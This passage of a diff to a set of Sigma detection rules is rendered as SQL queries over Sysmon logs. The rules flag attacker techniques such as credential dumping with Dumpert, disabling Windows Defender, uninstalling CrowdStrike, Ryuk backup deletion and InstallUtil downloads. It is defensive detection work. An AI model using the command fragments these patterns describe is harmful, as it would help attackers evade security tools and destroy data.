hklm\\\\software\\\\microsoft\\\\windows\\\\softwareinventorylogging /v collectionstate /reg:64%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /c PAUSE' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_seatbelt.yml" + "filename": "proc_creation_win_susp_elevated_system_shell.yml" }, { - "title": "Persistence Via TypedPaths - CommandLine", - "id": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", + "title": "Suspicious Execution of InstallUtil To Download", + "id": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", "status": "experimental", - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt", + "description": "Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. The files will be written to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR OriginalFileName = 'InstallUtil.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_typed_paths_persistence.yml" + "filename": "proc_creation_win_lolbin_installutil_download.yml" }, { - "title": "DLL Sideloading by VMware Xfer Utility", - "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", + "id": "b66474aa-bd92-4333-a16c-298155b120df", "status": "experimental", - "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", + "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" + "filename": "proc_creation_win_schtasks_powershell_persistence.yml" }, { - "title": "Netsh Allow Group Policy on Microsoft Defender Firewall", - "id": "347906f3-e207-4d18-ae5b-a9403d6bcdef", - "status": "test", - "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage", - "author": "frack113", + "title": "Sideloading Link.EXE", + "id": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", + "status": "experimental", + "description": "Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary \"link.exe\". They can be abused to sideload any binary with the same name", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1218" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%group=%' ESCAPE '\\' AND CommandLine LIKE '%new%' ESCAPE '\\' AND CommandLine LIKE '%enable=Yes%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\link.exe' ESCAPE '\\' AND CommandLine LIKE '%LINK /%' ESCAPE '\\') AND NOT (((ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\') AND ParentImage LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml" + "filename": "proc_creation_win_lolbin_sideload_link_binary.yml" }, { - "title": "Greedy File Deletion Using Del", - "id": "204b17ae-4007-471b-917b-b917b315c5db", + "title": "Disable Important Scheduled Task", + "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", "status": "experimental", - "description": "Detects execution of the \"del\" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.", - "author": "frack113", + "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.impact", + "attack.t1489" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%del %' ESCAPE '\\' OR CommandLine LIKE '%erase %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\\\*.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\*.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_del_greedy_deletion.yml" + "filename": "proc_creation_win_schtasks_disable.yml" }, { - "title": "HackTool - Dumpert Process Dumper Execution", - "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "title": "Explorer NOUACCHECK Flag", + "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "falsepositives": [ - "Very unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_hktl_dumpert.yml" - }, - { - "title": "Suspicious MSHTA Child Process", - "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", - "status": "test", - "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", - "author": "Michael Haag", "tags": [ "attack.defense_evasion", - "attack.t1218.005", - "car.2013-02-003", - "car.2013-03-001", - "car.2014-04-003" - ], - "falsepositives": [ - "Printer software / driver installations", - "HP software" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" - ], - "filename": "proc_creation_win_mshta_susp_child_processes.yml" - }, - { - "title": "Possible Shim Database Persistence via sdbinst.exe", - "id": "517490a7-115a-48c6-8862-1a481504d5a8", - "status": "test", - "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", - "author": "Markus Neis", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.011" + "attack.t1548.002" ], "falsepositives": [ - "Unknown" + "Domain Controller User Logon", + "Unknown how many legitimate software products use that method" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sdbinst_shim_persistence.yml" + "filename": "proc_creation_win_explorer_nouaccheck.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip", - "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", + "title": "Potential SPN Enumeration Via Setspn.EXE", + "id": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", "status": "test", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects service principal name (SPN) enumeration used for Kerberoasting", + "author": "Markus Neis, keepwatch", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Unknown" + "Administration activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\setspn.exe' ESCAPE '\\' OR OriginalFileName = 'setspn.exe' OR (Description LIKE '%Query or reset the computer%' ESCAPE '\\' AND Description LIKE '%SPN attribute%' ESCAPE '\\')) AND CommandLine LIKE '%-q%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_setspn_spn_enumeration.yml" }, { - "title": "Process Memory Dump Via Dotnet-Dump", - "id": "53d8d3e1-ca33-4012-adf3-e05a4d652e34", + "title": "Potential Discovery Activity Via Dnscmd.EXE", + "id": "b6457d63-d2a2-4e29-859d-4e7affc153d1", "status": "experimental", - "description": "Detects the execution of \"dotnet-dump\" with the \"collect\" flag. The execution could indicate potential process dumping of critical processes such as LSASS", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.", + "author": "@gott_cyber", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.execution", + "attack.t1543.003" ], "falsepositives": [ - "Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated" + "Legitimate administration use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dotnet-dump.exe' ESCAPE '\\' OR OriginalFileName = 'dotnet-dump.dll') AND CommandLine LIKE '%collect%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%/enumrecords%' ESCAPE '\\' OR CommandLine LIKE '%/enumzones%' ESCAPE '\\' OR CommandLine LIKE '%/ZonePrint%' ESCAPE '\\' OR CommandLine LIKE '%/info%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_dotnet_dump.yml" + "filename": "proc_creation_win_dnscmd_discovery.yml" }, { - "title": "Potential Tampering With Security Products Via WMIC", - "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", - "status": "test", - "description": "Detects uninstallation or termination of security products using the WMIC utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Defense Evasion Via Right-to-Left Override", + "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", + "status": "experimental", + "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", + "author": "Micah Babinski, @micahbabinski", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1036.002" ], "falsepositives": [ - "Legitimate administration" + "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%‮%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_uninstall_security_products.yml" + "filename": "proc_creation_win_susp_right_to_left_override.yml" }, { - "title": "Disable Windows Defender AV Security Monitoring", - "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "title": "Suspicious Csi.exe Usage", + "id": "40b95d31-1afc-469e-8d34-9a3a667d058e", "status": "experimental", - "description": "Detects attackers attempting to disable Windows Defender using Powershell", - "author": "ok @securonix invrep-de, oscd.community, frack113", + "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'", + "author": "Konstantin Grishchenko, oscd.community", "tags": [ + "attack.execution", + "attack.t1072", "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." + "Legitimate usage by software developers" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\csi.exe' ESCAPE '\\' OR Image LIKE '%\\\\rcsi.exe' ESCAPE '\\') OR OriginalFileName IN ('csi.exe', 'rcsi.exe')) AND Company = 'Microsoft Corporation')" ], - "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" + "filename": "proc_creation_win_csi_execution.yml" }, { - "title": "Remote Access Tool - ScreenConnect Execution", - "id": "57bff678-25d1-4d6c-8211-8ca106d12053", - "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Potential Ryuk Ransomware Activity", + "id": "c37510b8-2107-4b78-aa32-72f251e7a844", + "status": "stable", + "description": "Detects Ryuk ransomware activity", + "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate usage of the tool" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'ScreenConnect Service' OR Product = 'ScreenConnect' OR Company = 'ScreenConnect Software'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect.yml" + "filename": "proc_creation_win_malware_ryuk.yml" }, { - "title": "Uninstall Crowdstrike Falcon Sensor", - "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", - "status": "test", - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", - "author": "frack113", + "title": "Set Suspicious Files as System Files Using Attrib.EXE", + "id": "efec536f-72e8-4656-8960-5e85d091345b", + "status": "experimental", + "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1564.001" ], "falsepositives": [ - "Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" + "filename": "proc_creation_win_attrib_system_susp_paths.yml" }, { - "title": "HTML Help Shell Spawn", - "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", + "title": "HackTool - Bloodhound/Sharphound Execution", + "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", "status": "test", - "description": "Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)", - "author": "Maxim Pavlunin", + "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.001", - "attack.t1218.010", - "attack.t1218.011", + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1047", - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1218" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other programs that use these command line option and accepts an 'All' parameter" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE 'C:\\\\Windows\\\\hh.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR Image LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\Windows\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' 